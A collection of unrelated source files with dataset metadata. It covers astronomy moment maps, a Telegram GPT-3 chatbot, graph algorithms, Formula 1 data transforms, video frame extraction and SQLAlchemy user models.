how=how) # Normalize third moment by the linewidth to get the skewness skew = mom3 / linewidth ** 3 skew_name = "{}.skewness.fits".format(cube_base_name.rstrip(".fits")) skew.write(os.path.join(output_folder, skew_name), overwrite=True) # Kurtosis: Uncorrected log.info(f"Making kurtosis from cube {cube_base_name}") mom4 = 
cube[spectral_slice].moment(order=4, axis=0, how=how) # Normalize third moment by the linewidth to get the skewness # And subtract 3 to correct for Gaussian kurtosis of 3. kurt = (mom4 / linewidth ** 4) - 3 kurt_name = "{}.kurtosis.fits".format(cube_base_name.rstrip(".fits")) kurt.write(os.path.join(output_folder, kurt_name), overwrite=True) # Peak temperature map. And convert to K if in_memory: cube.allow_huge_operations = True log.info(f"Making peak temperature from cube {cube_base_name}") maxima = cube[spectral_slice].max(axis=0, how=how) if freq is not None: if not cube.unit.is_equivalent(u.K): if hasattr(cube, 'beams'): peak_temps = maxima * cube.beams.largest_beam().jtok(freq) elif hasattr(cube, 'beam'): peak_temps = maxima * cube.beam.jtok(freq) else: log.info("No beam object found. Cannot convert to K.") else: peak_temps = maxima peaktemps_name = "{}.peaktemps.fits".format(cube_base_name.rstrip(".fits")) peak_temps.write(os.path.join(output_folder, peaktemps_name), overwrite=True) log.info(f"Making peak velocity from cube {cube_base_name}") if make_peakvels: if in_memory: peakvels = find_peakvelocity_cube(cube[spectral_slice], smooth_size=smooth_size, how=how, num_cores=num_cores, spectral_slice=spectral_slice) else: peakvels = find_peakvelocity(cube_name, mask_name, source_mask=source_mask, chunk_size=chunk_size, smooth_size=smooth_size, spectral_slice=spectral_slice, verbose=verbose) peakvels = peakvels.astype(np.float32) peakvels.header["BITPIX"] = -32 peakvels_name = \ "{}.peakvels.fits".format(cube_base_name.rstrip(".fits")) peakvels.write(os.path.join(output_folder, peakvels_name), overwrite=True) def find_moment_names(path): ''' Given a path, make global variables of the moment names. 
''' search_dict = {"Moment0": "mom0", "Moment1": "mom1", "LWidth": "lwidth", "Skewness": "skewness", "Kurtosis": "kurtosis", "PeakTemp": "peaktemps", "PeakVels": "peakvels"} found_dict = {} for filename in glob.glob(os.path.join(path, "*.fits")): for key in search_dict: if search_dict[key] in filename: found_dict[key] = filename search_dict.pop(key) break return found_dict
en
0.714619
Return the velocity at the peak of a spectrum. # in_memory=False, num_cores=1, Calculate the peak velocity surface of a spectral cube # Open the cube to get some properties for the peak velocity # array # Now read in the source mask # if in_memory: # gener = [(cube[:, y, x], kern) # for y, x in zip(y_posn, x_posn)] # else: # gener = ((cube[:, y, x], kern) # for y, x in zip(y_posn, x_posn)) # with _map_context(num_cores, verbose=verbose) as map: # output = map(_peak_velocity, gener) # del gener # for out, y, x in zip(output, y_posn, x_posn): # peakvels[y, x] = out # peakvels[peakvels == 0.0 * u.m / u.s] = np.NaN * u.m / u.s # Make sure there are no garbage points outside of the cube spectral range Make peak velocity map with cube operations. Create the moment arrays. # Load in source mask # Allow loading in a custom mask to combine with the signal mask # For cases like M31 where the MW emission needs to be manually flagged # Now create the moment 1 and save it. Make a linewidth one too. # Skewness # Normalize third moment by the linewidth to get the skewness # Kurtosis: Uncorrected # Normalize third moment by the linewidth to get the skewness # And subtract 3 to correct for Gaussian kurtosis of 3. # Peak temperature map. And convert to K Given a path, make global variables of the moment names.
2.185622
2
src/service.py
wisrovi/chat_telegram_gpt3
0
6623600
<gh_stars>0 # -*- coding: utf-8 -*- # !pip install python-telegram-bot from telegram.ext import (Updater, CommandHandler, MessageHandler, Filters) from config import TOKEN_TELEGRAM as config from gpt3 import getAnswer as gpt3 from files import writeSession as session def start(update, context): context.bot.send_message(update.message.chat_id, "Bienvenido") def mensaje_nocomando(update, context): cid = update.message.chat_id # obtengo el id_usuario question_user = update.message.text # obtengo el mensaje del usuario old_log = session.getLog(cid) # miro si hay un log previo cargado en cache, sino creo el cache para este usuario answer, new_log = gpt3.getAnswer(question_user, old_log) # le pido a la IA una respuesta al comentario del usuario session.writeSession(cid, new_log) # guardo el cache para este usuario update.message.reply_text(answer) # respondo al usuario if __name__=="__main__": print("Chatbot iniciado.") updater = Updater(config.TOKEN_TELEGRAM, use_context=True) dp=updater.dispatcher dp.add_handler(CommandHandler("start", start)) # respuesta al comando /start dp.add_handler(MessageHandler(Filters.text, mensaje_nocomando)) # respuesta a los comentarios del usuario updater.start_polling() updater.idle()
# -*- coding: utf-8 -*- # !pip install python-telegram-bot from telegram.ext import (Updater, CommandHandler, MessageHandler, Filters) from config import TOKEN_TELEGRAM as config from gpt3 import getAnswer as gpt3 from files import writeSession as session def start(update, context): context.bot.send_message(update.message.chat_id, "Bienvenido") def mensaje_nocomando(update, context): cid = update.message.chat_id # obtengo el id_usuario question_user = update.message.text # obtengo el mensaje del usuario old_log = session.getLog(cid) # miro si hay un log previo cargado en cache, sino creo el cache para este usuario answer, new_log = gpt3.getAnswer(question_user, old_log) # le pido a la IA una respuesta al comentario del usuario session.writeSession(cid, new_log) # guardo el cache para este usuario update.message.reply_text(answer) # respondo al usuario if __name__=="__main__": print("Chatbot iniciado.") updater = Updater(config.TOKEN_TELEGRAM, use_context=True) dp=updater.dispatcher dp.add_handler(CommandHandler("start", start)) # respuesta al comando /start dp.add_handler(MessageHandler(Filters.text, mensaje_nocomando)) # respuesta a los comentarios del usuario updater.start_polling() updater.idle()
es
0.969596
# -*- coding: utf-8 -*- # !pip install python-telegram-bot # obtengo el id_usuario # obtengo el mensaje del usuario # miro si hay un log previo cargado en cache, sino creo el cache para este usuario # le pido a la IA una respuesta al comentario del usuario # guardo el cache para este usuario # respondo al usuario # respuesta al comando /start # respuesta a los comentarios del usuario
2.608485
3
graph_test.py
QMH-TMY/Arithmetic
0
6623601
<reponame>QMH-TMY/Arithmetic # -*- coding:UTF8 -*- #!/usr/bin/python #Shieber on 2018/8/8 #图及其结构 from graph import Graph from queue import Queue,PriorityQueue #********************问题1****************************************# def buildCharGraph(wordFile): '''字梯圖''' wdLis = {} graph = Graph() wfile = open(wordFile,'r') for line in wfile: word = line[:-1] #去掉换行符 for i in range(len(word)): sig = word[:i] + '_' + word[i+1:] if sig in wdLis: wdLis[sig].append(word) else: wdLis[sig] = [word] for sig in wdLis.keys(): for word1 in wdLis[sig]: for word2 in wdLis[sig]: if word1 != word2: graph.addEdge(word1,word2) return graph #G,d = buildCharGraph("wordfile.txt") #print(G.getVertices()) #print(G.getEdge()) #print(d.keys()) #*******解决方案********# def BFS(G,start): '''字梯图解决方案:广度优先搜索,时间复杂度:O(V+E)''' start = G.getVertex(start) start.setDistance(0) start.setPred(None) vertQueue = Queue() #加入队列 vertQueue.enqueue(start) while vertQueue.size() > 0: currVert = vertQueue.dequeue() for nbr in currVert.getConnections(): if 'white' == nbr.getColor(): nbr.setColor('grey') nbr.setPred(currVert) nbr.setDistance(currVert.getDistance()+1) vertQueue.enqueue(nbr) currVert.setColor('black') def traverse(G,mark): '''打印出任意字回到原始字的路径''' node = G.getVertex(mark) dist = 0 while node.getPred(): print(node.getId(),dist) dist += 1 node = node.getPred() print(node.getId(),dist) #********************问题2****************************************# def kinghtGraph(size): '''骑士之旅图''' ktGraph = Graph() for row in xrange(size): for col in xrange(size): currNode = pos2node(row,col,size) #将坐标转换为点数 legalPos = getPos(row,col,size) #得到可去的坐标 for pos in legalPos: avalNode = pos2node(pos[0],pos[1],size) ktGraph.addEdge(currNode,avalNode) return ktGraph def getPos(row,col,size): '''得到可去的坐标''' newMoves = [] stepVector = [ (-2,-1),(-1,-2),(2,-1),(1,-2), (-2, 1),(-1, 2),(2, 1),(1, 2) #对于马来说,可以移动的步伐向量 ] for step in stepVector: newRow = row + step[0] newCol = col + step[1] if legal(newRow,newCol,size): 
newMoves.append((newRow,newCol)) return newMoves def legal(row,col,size): '''判断是否超界''' return True if 0<= row < size and 0<= col < size else False #if 0<= row < size and 0<= col < size: # return True #else: # return False def pos2node(row,col,size): '''将坐标转换为点数''' return (row * size) + col #print "point number:%d"%g.numVertice #print "Edge number:%d"%g.edgeNumber #print "space rate :%.2f%%"%((g.edgeNumber + 0.0)*100/(i**4)) #*******解决方案1********# def DFS1(depth,path,vertex,limit): '''深度优先树,时间复杂度:O(k^N),非常高''' vertex.setColor('grey') path.append(vertex) if depth < limit: nbrList = list(vertex.getConnections()) done = False index = 0 while index < len(nbrList) and not done: if 'white' == nbrList[index].getColor(): done = DFS1(depth+1,path,nbrList[index],limit) index += 1 if not done: path.pop() vertex.setColor('white') else: done = True return done #*******解决方案2********# def orderByAvail(vertex): '''启发式算法,局部搜索''' resList = [] for vet in vertex.getConnections(): if 'white' == vet.getColor(): depth = 0 for w in vet.getConnections(): if 'white' == w.getColor(): depth += 1 resList.append((depth,vet)) resList.sort(key=lambda item:item[0]) return [minivet[1] for minivet in resList] def DFS2(depth,path,vertex,limit): '''深度优先树,结合启发式算法,时间复杂度:O(2^N),''' vertex.setColor('grey') path.append(vertex) if depth < limit: nbrList = orderByAvail(vertex) #从短的到长的,反向来 done = False index = 0 while index < len(nbrList) and not done: if 'white' == nbrList[index].getColor(): done = DFS2(depth+1,path,nbrList[index],limit) index += 1 if not done: path.pop() vertex.setColor('white') else: done = True return done ''' G = kinghtGraph(8) path = [] vertex = G.getVertex(0) DFS2(0,path,vertex,63) print len(path) ''' ######################################################### class DFSGraph(Graph): '''通用深度优化森林,时间复杂度:O(V+E)''' def __init__(self): super().__init__() self.time = 0 def dfs(self): '''清空点的颜色,从新开始迭代查找''' for aVertex in self: aVertex.setColor('white') aVertex.setPred(-1) for aVertex in self: if 
'white' == aVertex.getColor(): self.dfsvisit(aVertex) def dfsvisit(self,startVertex): '''迭代查找''' startVertex.setColor('gray') self.time += 1 startVertex.setDiscovery(self.time) for nextVertex in startVertex.getConnections(): if 'white' == nextVertex.getColor(): nextVertex.setPred(startVertex) self.dfsvisit(nextVertex) startVertex.setColor('black') self.time += 1 startVertex.setFinish(self.time) ######################################################### #/*******************************/# def SCC(DFSgraph1): '''强连通分量算法''' DFSgraph1.dfs() #计算图的完成时间 fini1 = sortFini(DFSgraph1) #func1 DFSgraph2 = transGraph(DFSgraph1) #转置图 func2 DFSgraph2.dfs() fini2 = sortFini(DFSgraph2,False) position = [i for i in range(len(fini1)) if fini1[i] == fini2[i]] graphlis = splitList(Olist,position) #func3 return graphlis def sortFini(graph,rever=True): '''联通量算法辅助1:将完成时间列表排序''' fini = [(item.fini,item.id) for item in graph.vertexList.values()] fini.sort(key=lambda item:item[0],reverse=rever) #从大到小排列完成时间 return fini def transGraph(graph): '''连通量算法辅助2:得到一幅图的转置图''' newgraph = DFSgraph() for vert in graph.vertexList.keys(): for nbr in vert.getConnections(): newgraph.addEdge(nbr,vert,vert.getWeight(nbr)) return newgraph def splitList(Olist,pos): '''连通量算法辅助3:拆分列表''' Glist = [] length = len(Olist)-1 keyval = pos[-1] for i in xrange(len(posList)): if keyval != length: if keyval == pos[i]: Glist.append(Olist[pos[i]:]) elif pos[i]+1 == pos[i+1]: Glist.append(Olist[pos[i]]) else: Glist.append(Olist[pos[i]]) Glist.append(Olist[pos[i]+1:pos[i+1]]) else: if keyval == pos[i]: Glist.append(Olist[keyval]) elif pos[i]+1 == pos[i+1]: Glist.append(Olist[pos[i]]) else: Glist.append(Olist[pos[i]]) Glist.append(Olist[pos[i]+1:pos[i+1]]) return Glist #总的列表,存储所有小的连通量 #/*******************************/# def dijkstra(G,start): '''最短路径算法,时间复杂度:O((V+E)logV) 需要整个图,实际运用不现实 距离矢量路由算法只需要一部分图顶点''' start = G.getVertex(start) start.setDistance(0) PriQueue = PriorityQueue() #加入队列 PriQueue.buildHeap([(v.getDistance(),v) for v in 
G]) while not PriQueue.isEmpty(): currVert = PriQueue.delMin() for nbr in currVert.getConnections(): newDist = currVert.getDistance() + currVert.getWeight(nbr) if newDist < nbr.getDistance(): nbr.setPred(currVert) nbr.setDistance(newDist) PriQueue.decreaseKey(nbr,newDist) #/*******************************/# def prim(G,start): '''贪婪算法系列算法,时间复杂度:O((V+E)logV + V)''' for v in G: v.setDistance(sys.maxsize) v.setPred(None) start = G.getVertex(start) start.setDistance(0) PriQueue = PriorityQueue() #创建优先队列 PriQueue.buildHeap([(v.getDistance(),v) for v in G]) while not PriQueue.isEmpty(): currVert = PriQueue.delMin() for nbr in currVert.getConnections(): newDist = currVert.getDistance() + currVert.getWeight(nbr) if nbr in PriQueue and newDist < nbr.getDistance(): nbr.setPred(currVert) nbr.setDistance(newDist) PriQueue.decreaseKey(nbr,newDist) def getMinPath(G,endpos): '''打印出任意顶点回到起点的最短路径''' node = G.getVertex(endpos) dist = node.getDistance() while None != node.getPred(): dist = node.getDistance() print(node.getId(),dist) node = node.getPred() print(node.getId(),dist) #/*******************************/#
# -*- coding:UTF8 -*- #!/usr/bin/python #Shieber on 2018/8/8 #图及其结构 from graph import Graph from queue import Queue,PriorityQueue #********************问题1****************************************# def buildCharGraph(wordFile): '''字梯圖''' wdLis = {} graph = Graph() wfile = open(wordFile,'r') for line in wfile: word = line[:-1] #去掉换行符 for i in range(len(word)): sig = word[:i] + '_' + word[i+1:] if sig in wdLis: wdLis[sig].append(word) else: wdLis[sig] = [word] for sig in wdLis.keys(): for word1 in wdLis[sig]: for word2 in wdLis[sig]: if word1 != word2: graph.addEdge(word1,word2) return graph #G,d = buildCharGraph("wordfile.txt") #print(G.getVertices()) #print(G.getEdge()) #print(d.keys()) #*******解决方案********# def BFS(G,start): '''字梯图解决方案:广度优先搜索,时间复杂度:O(V+E)''' start = G.getVertex(start) start.setDistance(0) start.setPred(None) vertQueue = Queue() #加入队列 vertQueue.enqueue(start) while vertQueue.size() > 0: currVert = vertQueue.dequeue() for nbr in currVert.getConnections(): if 'white' == nbr.getColor(): nbr.setColor('grey') nbr.setPred(currVert) nbr.setDistance(currVert.getDistance()+1) vertQueue.enqueue(nbr) currVert.setColor('black') def traverse(G,mark): '''打印出任意字回到原始字的路径''' node = G.getVertex(mark) dist = 0 while node.getPred(): print(node.getId(),dist) dist += 1 node = node.getPred() print(node.getId(),dist) #********************问题2****************************************# def kinghtGraph(size): '''骑士之旅图''' ktGraph = Graph() for row in xrange(size): for col in xrange(size): currNode = pos2node(row,col,size) #将坐标转换为点数 legalPos = getPos(row,col,size) #得到可去的坐标 for pos in legalPos: avalNode = pos2node(pos[0],pos[1],size) ktGraph.addEdge(currNode,avalNode) return ktGraph def getPos(row,col,size): '''得到可去的坐标''' newMoves = [] stepVector = [ (-2,-1),(-1,-2),(2,-1),(1,-2), (-2, 1),(-1, 2),(2, 1),(1, 2) #对于马来说,可以移动的步伐向量 ] for step in stepVector: newRow = row + step[0] newCol = col + step[1] if legal(newRow,newCol,size): newMoves.append((newRow,newCol)) return newMoves def 
legal(row,col,size): '''判断是否超界''' return True if 0<= row < size and 0<= col < size else False #if 0<= row < size and 0<= col < size: # return True #else: # return False def pos2node(row,col,size): '''将坐标转换为点数''' return (row * size) + col #print "point number:%d"%g.numVertice #print "Edge number:%d"%g.edgeNumber #print "space rate :%.2f%%"%((g.edgeNumber + 0.0)*100/(i**4)) #*******解决方案1********# def DFS1(depth,path,vertex,limit): '''深度优先树,时间复杂度:O(k^N),非常高''' vertex.setColor('grey') path.append(vertex) if depth < limit: nbrList = list(vertex.getConnections()) done = False index = 0 while index < len(nbrList) and not done: if 'white' == nbrList[index].getColor(): done = DFS1(depth+1,path,nbrList[index],limit) index += 1 if not done: path.pop() vertex.setColor('white') else: done = True return done #*******解决方案2********# def orderByAvail(vertex): '''启发式算法,局部搜索''' resList = [] for vet in vertex.getConnections(): if 'white' == vet.getColor(): depth = 0 for w in vet.getConnections(): if 'white' == w.getColor(): depth += 1 resList.append((depth,vet)) resList.sort(key=lambda item:item[0]) return [minivet[1] for minivet in resList] def DFS2(depth,path,vertex,limit): '''深度优先树,结合启发式算法,时间复杂度:O(2^N),''' vertex.setColor('grey') path.append(vertex) if depth < limit: nbrList = orderByAvail(vertex) #从短的到长的,反向来 done = False index = 0 while index < len(nbrList) and not done: if 'white' == nbrList[index].getColor(): done = DFS2(depth+1,path,nbrList[index],limit) index += 1 if not done: path.pop() vertex.setColor('white') else: done = True return done ''' G = kinghtGraph(8) path = [] vertex = G.getVertex(0) DFS2(0,path,vertex,63) print len(path) ''' ######################################################### class DFSGraph(Graph): '''通用深度优化森林,时间复杂度:O(V+E)''' def __init__(self): super().__init__() self.time = 0 def dfs(self): '''清空点的颜色,从新开始迭代查找''' for aVertex in self: aVertex.setColor('white') aVertex.setPred(-1) for aVertex in self: if 'white' == aVertex.getColor(): self.dfsvisit(aVertex) 
def dfsvisit(self,startVertex): '''迭代查找''' startVertex.setColor('gray') self.time += 1 startVertex.setDiscovery(self.time) for nextVertex in startVertex.getConnections(): if 'white' == nextVertex.getColor(): nextVertex.setPred(startVertex) self.dfsvisit(nextVertex) startVertex.setColor('black') self.time += 1 startVertex.setFinish(self.time) ######################################################### #/*******************************/# def SCC(DFSgraph1): '''强连通分量算法''' DFSgraph1.dfs() #计算图的完成时间 fini1 = sortFini(DFSgraph1) #func1 DFSgraph2 = transGraph(DFSgraph1) #转置图 func2 DFSgraph2.dfs() fini2 = sortFini(DFSgraph2,False) position = [i for i in range(len(fini1)) if fini1[i] == fini2[i]] graphlis = splitList(Olist,position) #func3 return graphlis def sortFini(graph,rever=True): '''联通量算法辅助1:将完成时间列表排序''' fini = [(item.fini,item.id) for item in graph.vertexList.values()] fini.sort(key=lambda item:item[0],reverse=rever) #从大到小排列完成时间 return fini def transGraph(graph): '''连通量算法辅助2:得到一幅图的转置图''' newgraph = DFSgraph() for vert in graph.vertexList.keys(): for nbr in vert.getConnections(): newgraph.addEdge(nbr,vert,vert.getWeight(nbr)) return newgraph def splitList(Olist,pos): '''连通量算法辅助3:拆分列表''' Glist = [] length = len(Olist)-1 keyval = pos[-1] for i in xrange(len(posList)): if keyval != length: if keyval == pos[i]: Glist.append(Olist[pos[i]:]) elif pos[i]+1 == pos[i+1]: Glist.append(Olist[pos[i]]) else: Glist.append(Olist[pos[i]]) Glist.append(Olist[pos[i]+1:pos[i+1]]) else: if keyval == pos[i]: Glist.append(Olist[keyval]) elif pos[i]+1 == pos[i+1]: Glist.append(Olist[pos[i]]) else: Glist.append(Olist[pos[i]]) Glist.append(Olist[pos[i]+1:pos[i+1]]) return Glist #总的列表,存储所有小的连通量 #/*******************************/# def dijkstra(G,start): '''最短路径算法,时间复杂度:O((V+E)logV) 需要整个图,实际运用不现实 距离矢量路由算法只需要一部分图顶点''' start = G.getVertex(start) start.setDistance(0) PriQueue = PriorityQueue() #加入队列 PriQueue.buildHeap([(v.getDistance(),v) for v in G]) while not PriQueue.isEmpty(): currVert = 
PriQueue.delMin() for nbr in currVert.getConnections(): newDist = currVert.getDistance() + currVert.getWeight(nbr) if newDist < nbr.getDistance(): nbr.setPred(currVert) nbr.setDistance(newDist) PriQueue.decreaseKey(nbr,newDist) #/*******************************/# def prim(G,start): '''贪婪算法系列算法,时间复杂度:O((V+E)logV + V)''' for v in G: v.setDistance(sys.maxsize) v.setPred(None) start = G.getVertex(start) start.setDistance(0) PriQueue = PriorityQueue() #创建优先队列 PriQueue.buildHeap([(v.getDistance(),v) for v in G]) while not PriQueue.isEmpty(): currVert = PriQueue.delMin() for nbr in currVert.getConnections(): newDist = currVert.getDistance() + currVert.getWeight(nbr) if nbr in PriQueue and newDist < nbr.getDistance(): nbr.setPred(currVert) nbr.setDistance(newDist) PriQueue.decreaseKey(nbr,newDist) def getMinPath(G,endpos): '''打印出任意顶点回到起点的最短路径''' node = G.getVertex(endpos) dist = node.getDistance() while None != node.getPred(): dist = node.getDistance() print(node.getId(),dist) node = node.getPred() print(node.getId(),dist) #/*******************************/#
zh
0.621372
# -*- coding:UTF8 -*- #!/usr/bin/python #Shieber on 2018/8/8 #图及其结构 #********************问题1****************************************# 字梯圖 #去掉换行符 #G,d = buildCharGraph("wordfile.txt") #print(G.getVertices()) #print(G.getEdge()) #print(d.keys()) #*******解决方案********# 字梯图解决方案:广度优先搜索,时间复杂度:O(V+E) #加入队列 打印出任意字回到原始字的路径 #********************问题2****************************************# 骑士之旅图 #将坐标转换为点数 #得到可去的坐标 得到可去的坐标 #对于马来说,可以移动的步伐向量 判断是否超界 #if 0<= row < size and 0<= col < size: # return True #else: # return False 将坐标转换为点数 #print "point number:%d"%g.numVertice #print "Edge number:%d"%g.edgeNumber #print "space rate :%.2f%%"%((g.edgeNumber + 0.0)*100/(i**4)) #*******解决方案1********# 深度优先树,时间复杂度:O(k^N),非常高 #*******解决方案2********# 启发式算法,局部搜索 深度优先树,结合启发式算法,时间复杂度:O(2^N), #从短的到长的,反向来 G = kinghtGraph(8) path = [] vertex = G.getVertex(0) DFS2(0,path,vertex,63) print len(path) ######################################################### 通用深度优化森林,时间复杂度:O(V+E) 清空点的颜色,从新开始迭代查找 迭代查找 ######################################################### #/*******************************/# 强连通分量算法 #计算图的完成时间 #func1 #转置图 func2 #func3 联通量算法辅助1:将完成时间列表排序 #从大到小排列完成时间 连通量算法辅助2:得到一幅图的转置图 连通量算法辅助3:拆分列表 #总的列表,存储所有小的连通量 #/*******************************/# 最短路径算法,时间复杂度:O((V+E)logV) 需要整个图,实际运用不现实 距离矢量路由算法只需要一部分图顶点 #加入队列 #/*******************************/# 贪婪算法系列算法,时间复杂度:O((V+E)logV + V) #创建优先队列 打印出任意顶点回到起点的最短路径 #/*******************************/#
3.424286
3
DataPipeline/transform.py
kelleyjean/condenast-de-project
0
6623602
import pandas as pd import csv import glob from datetime import datetime pickle_path = 'pickle_files' pickle_files = glob.glob(pickle_path + '/*.pkl') pitstops_df = pd.read_pickle(pickle_path + './pit_stops.csv.pkl') races_df = pd.read_pickle(pickle_path + './races.csv.pkl') driver_df = pd.read_pickle(pickle_path + './drivers.csv.pkl') results_df = pd.read_pickle(pickle_path + './results.csv.pkl') def clean_data(): pitstops_df['duration'] = pd.to_numeric(pitstops_df.duration, errors='coerce') return pitstops_df def transformation_1(): clean_data() #merges pitstops and races on raceId to bring in race name merged_df_1 = pitstops_df.merge(races_df, how='inner', on = 'raceId') merged_df_2 = merged_df_1.merge(driver_df, how='inner', on = 'driverId') new_df_cols = merged_df_2.columns.tolist() if 'driverId' and 'raceId' and 'forename' and 'surname' and 'name' in new_df_cols: print('driverId, raceId, forename, surname, and name exist in new dataframe.') else: print('One or more columns are missing.') if 'duration' in new_df_cols and merged_df_2['duration'].dtype == 'float64': print('duration exists in dataframe and datatype is float.') else: print('duration does not exist in dataframe') analysis_df = merged_df_2[['raceId', 'driverId', 'name', 'forename', 'surname', 'duration']] # group data to get average duration and write to csv file analysis_df = analysis_df.groupby(['raceId', 'driverId', 'name', 'forename', 'surname'], as_index=False)['duration'].mean() analysis_df.to_csv( 'transformation_1.csv', index=False, encoding='utf-8' ) def transformation_2(): driver_df['code'] = driver_df['surname'].str.upper() driver_df['code'] = driver_df['code'].str.slice(start=0, stop=3) driver_df.to_csv( 'transformation_2.csv', index=False, encoding='utf-8' ) def transformation_3(season_year): season_year = season_year merged_df_1 = races_df.merge(results_df, how='inner', on = 'raceId') merged_df_2 = merged_df_1.merge(driver_df, how='inner', on = 'driverId') selected_year_df = 
merged_df_2.loc[merged_df_2['year'] == season_year] #pseudo logic: #a year (int64) is passed through the function which selects the season to run the analysis #select min(season_year_race_date) and max(season_year_race_date) #create two columns, the driver's DOB subtracted from the min(season_year_date) and the driver's DOB subtracted from max(season_year_date) # for min(season_year_dat) column, select the driver(s) with youngest/oldest age, and do the same for max(season_year_date) # return results to csv #exception handling should be implemented in the event that the season_year entered is not within the range of years in the file transformation_1() transformation_2()
import pandas as pd import csv import glob from datetime import datetime pickle_path = 'pickle_files' pickle_files = glob.glob(pickle_path + '/*.pkl') pitstops_df = pd.read_pickle(pickle_path + './pit_stops.csv.pkl') races_df = pd.read_pickle(pickle_path + './races.csv.pkl') driver_df = pd.read_pickle(pickle_path + './drivers.csv.pkl') results_df = pd.read_pickle(pickle_path + './results.csv.pkl') def clean_data(): pitstops_df['duration'] = pd.to_numeric(pitstops_df.duration, errors='coerce') return pitstops_df def transformation_1(): clean_data() #merges pitstops and races on raceId to bring in race name merged_df_1 = pitstops_df.merge(races_df, how='inner', on = 'raceId') merged_df_2 = merged_df_1.merge(driver_df, how='inner', on = 'driverId') new_df_cols = merged_df_2.columns.tolist() if 'driverId' and 'raceId' and 'forename' and 'surname' and 'name' in new_df_cols: print('driverId, raceId, forename, surname, and name exist in new dataframe.') else: print('One or more columns are missing.') if 'duration' in new_df_cols and merged_df_2['duration'].dtype == 'float64': print('duration exists in dataframe and datatype is float.') else: print('duration does not exist in dataframe') analysis_df = merged_df_2[['raceId', 'driverId', 'name', 'forename', 'surname', 'duration']] # group data to get average duration and write to csv file analysis_df = analysis_df.groupby(['raceId', 'driverId', 'name', 'forename', 'surname'], as_index=False)['duration'].mean() analysis_df.to_csv( 'transformation_1.csv', index=False, encoding='utf-8' ) def transformation_2(): driver_df['code'] = driver_df['surname'].str.upper() driver_df['code'] = driver_df['code'].str.slice(start=0, stop=3) driver_df.to_csv( 'transformation_2.csv', index=False, encoding='utf-8' ) def transformation_3(season_year): season_year = season_year merged_df_1 = races_df.merge(results_df, how='inner', on = 'raceId') merged_df_2 = merged_df_1.merge(driver_df, how='inner', on = 'driverId') selected_year_df = 
merged_df_2.loc[merged_df_2['year'] == season_year] #pseudo logic: #a year (int64) is passed through the function which selects the season to run the analysis #select min(season_year_race_date) and max(season_year_race_date) #create two columns, the driver's DOB subtracted from the min(season_year_date) and the driver's DOB subtracted from max(season_year_date) # for min(season_year_dat) column, select the driver(s) with youngest/oldest age, and do the same for max(season_year_date) # return results to csv #exception handling should be implemented in the event that the season_year entered is not within the range of years in the file transformation_1() transformation_2()
en
0.863017
#merges pitstops and races on raceId to bring in race name # group data to get average duration and write to csv file #pseudo logic: #a year (int64) is passed through the function which selects the season to run the analysis #select min(season_year_race_date) and max(season_year_race_date) #create two columns, the driver's DOB subtracted from the min(season_year_date) and the driver's DOB subtracted from max(season_year_date) # for min(season_year_dat) column, select the driver(s) with youngest/oldest age, and do the same for max(season_year_date) # return results to csv #exception handling should be implemented in the event that the season_year entered is not within the range of years in the file
3.271378
3
cutvideo2frames.py
Talegqz/phased_based-motion__disentanglement
1
6623603
<filename>cutvideo2frames.py import numpy as np import cv2 from PIL import Image import os def deal_video(): cap = cv2.VideoCapture('data/cinesmall.avi') a = 0 frams = [] while(cap.isOpened()): ret, frame = cap.read() a+=1 # pic.show() if ret == True: frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) pic = Image.fromarray(frame,"RGB") # pic = pic.resize((64,64)) pic.save('data/cine/%d.png'%a) # cv2.imshow('frame',frame) else: break if cv2.waitKey(1) & 0xFF == ord('q'): break cap.release() cv2.destroyAllWindows() if __name__ == '__main__': deal_video()
<filename>cutvideo2frames.py import numpy as np import cv2 from PIL import Image import os def deal_video(): cap = cv2.VideoCapture('data/cinesmall.avi') a = 0 frams = [] while(cap.isOpened()): ret, frame = cap.read() a+=1 # pic.show() if ret == True: frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) pic = Image.fromarray(frame,"RGB") # pic = pic.resize((64,64)) pic.save('data/cine/%d.png'%a) # cv2.imshow('frame',frame) else: break if cv2.waitKey(1) & 0xFF == ord('q'): break cap.release() cv2.destroyAllWindows() if __name__ == '__main__': deal_video()
en
0.192178
# pic.show() # pic = pic.resize((64,64)) # cv2.imshow('frame',frame)
2.941422
3
charybdis/user/models.py
gitter-badger/charybdis
0
6623604
<filename>charybdis/user/models.py from uuid import uuid4 from passlib.hash import pbkdf2_sha512 from slugify import slugify from sqlalchemy.dialects.postgresql import UUID from sqlalchemy.ext.hybrid import hybrid_property from sqlalchemy.orm import backref from ..app import db from ..domain.models import Domain from ..permission.models import Permission from ..project.models import Project class UserRole(db.Model): slug = db.Column(db.String, nullable=False) @db.validates("slug") def validate_slug(self, key, value) -> str: assert slugify(value) == value, "Incorrect slug for user role!" return value class User(db.Model): first_name = db.Column(db.String, nullable=False) last_name = db.Column(db.String, nullable=False) patronymic = db.Column(db.String, nullable=True) birthday = db.Column(db.Date, nullable=False) role_id = db.Column(db.Integer, db.ForeignKey(UserRole.id), nullable=False) role = db.relationship(UserRole) is_active = db.Column(db.Boolean, default=True, server_default="true") username = db.Column(db.String, unique=True) _password_hash = db.Column("password_hash", db.String) uuid = db.Column(UUID(as_uuid=True), default=uuid4, nullable=False) domain_id = db.Column(db.Integer, db.ForeignKey(Domain.id), nullable=False) domain = db.relationship(Domain) @db.validates("username") def validate_username(self, key: str, value: str) -> str: assert value == slugify(value), "Incorrect username!" 
return value @property def rolename(self): return self.role.slug @classmethod def lookup(cls, username): return cls.query.filter_by(username=username).one_or_none() @hybrid_property def password_hash(self) -> str: return self._password_hash @password_hash.setter def password_hash(self, value: str) -> None: self._password_hash = <PASSWORD>.<PASSWORD>(value) def check_password(self, candidate: str) -> bool: return pbkdf2_sha512.verify(candidate, self._password_hash) class UserPermissionLinker(db.Model): permission_id = db.Column(db.Integer, db.ForeignKey(Permission.id), nullable=False) user_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False) permission = db.relationship(Permission, uselist=False) user = db.relationship(User) project_id = db.Column(db.Integer, db.ForeignKey(Project.id), nullable=False) project = db.relationship(Project, backref=backref("users"), uselist=False) __table_args__ = (db.UniqueConstraint("permission_id", "user_id", "project_id"),)
